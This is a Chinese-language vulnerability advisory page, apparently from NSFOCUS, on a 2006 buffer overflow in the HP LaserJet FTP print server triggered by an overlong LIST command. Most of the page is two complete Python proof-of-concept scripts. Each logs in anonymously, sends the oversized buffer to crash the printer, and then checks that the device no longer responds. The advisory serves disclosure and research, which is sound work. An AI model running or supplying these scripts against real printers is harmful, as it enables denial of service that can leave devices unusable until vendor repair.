首页 -> 安全研究

安全研究

安全漏洞
HP LaserJet FTP打印服务器LIST命令缓冲区溢出漏洞

发布日期:2006-12-19
更新日期:2006-12-20

受影响系统:
HP LaserJet 5100 Series
HP LaserJet 5000 Series
HP FTP Print Server 2.4.5
HP FTP Print Server 2.4
描述:
BUGTRAQ  ID: 21666

HP LaserJet是HP推出的激光打印机系列。

HP LaserJet的FTP打印服务实现上存在漏洞,远程攻击者可能利用此漏洞对打印机执行拒绝服务攻击,导致打印机无法工作。

如果启用了FTP打印服务器的话,HP打印机就可能存在缓冲区溢出漏洞。如果攻击者能够发送带超长参数(大约256个字符)的LIST命令的话,就会触发这个溢出,导致拒绝服务。即使在重启后打印机仍会没有响应,必须厂商的技术支持才能修复崩溃的打印机。

<*来源:Joxean Koret (joxeankoret@yahoo.es
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=116655188816617&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

["dos2.4.5.py" (dos2.4.5.py)]

#!/usr/bin/python

import sys
from ftplib import FTP

print "Hewlett-Packard FTP Print Server Version 2.4.5 Buffer Overflow (POC)"
print "Copyright (c) Joxean Koret"
print

if len(sys.argv) == 1:
    print "Usage: %s <target>" % sys.argv[0]
    sys.exit(0)

target = sys.argv[1]

print "[+] Running attack against " + target

try:
    ftp = FTP(target)
except:
    print "[!] Can't connect to target", target, ".", sys.exc_info()[1]
    sys.exit(0)
try:
    msg = ftp.login() # Login anonymously
    print msg
except:
    print "[!] Error logging anonymously.",sys.exc_info()[1]
    sys.exit(0)

buf = "./A"
iMax = 9

for i in range(iMax):
    buf += buf

print "[+] Sending buffer of",len(buf[0:3000]),"byte(s) ... "

try:
    print "[+] Please, note that sometimes your connection will not be dropped. "
    ftp.retrlines("LIST " + buf[0:3000])
    print "[!] Exploit doesn't work :("
    print
    sys.exit(0)
except:
    print "[+] Apparently exploit works. Verifying ... "
    print sys.exc_info()[1]

ftp2 = FTP(target)

try:
    msg = ftp2.login()
    print "[!] No, it doesn't work :( "
    print
    print msg
    sys.exit(0)
except:
    print "[+] Yes, it works."
    print sys.exc_info()[1]

=========================================================================

["dos2.4.py" (dos2.4.py)]

#!/usr/bin/python

import sys
from ftplib import FTP

print "Hewlett-Packard FTP Print Server Version 2.4 Buffer Overflow (POC)"
print "Copyright (c) Joxean Koret"
print

if len(sys.argv) == 1:
    print "Usage: %s <target>" % sys.argv[0]
    sys.exit(0)

target = sys.argv[1]

print "[+] Running attack against " + target

try:
    ftp = FTP(target)
except:
    print "[!] Can't connect to target", target, ".", sys.exc_info()[1]
    sys.exit(0)
try:
    msg = ftp.login() # Login anonymously
    print msg
except:
    print "[!] Error logging anonymously.",sys.exc_info()[1]
    sys.exit(0)

iMax = 6
buf = "./A."

for i in range(iMax):
    buf += buf

print "[+] Sending buffer of",len(buf),"byte(s) ... "

try:
    print "[+] Please, note that sometimes your connection will not be dropped. "
    ftp.retrlines("LIST " + buf)
    print "[!] Exploit doesn't work :("
    print
    sys.exit(0)
except:
    print "[+] Apparently exploit works. Verifying ... "
    print sys.exc_info()[1]

ftp2 = FTP(target)

try:
    msg = ftp2.login()
    print "[!] No, it doesn't work :( "
    print
    print msg
    sys.exit(0)
except:
    print "[+] Yes, it works."
    print sys.exc_info()[1]

建议:
厂商补丁:

HP
--
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://itrc.hp.com

浏览次数:4921
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障
关于我们
公司介绍
公司荣誉
公司新闻
联系我们
公司总部
分支机构
海外机构
快速链接
绿盟云
绿盟威胁情报中心NTI
技术博客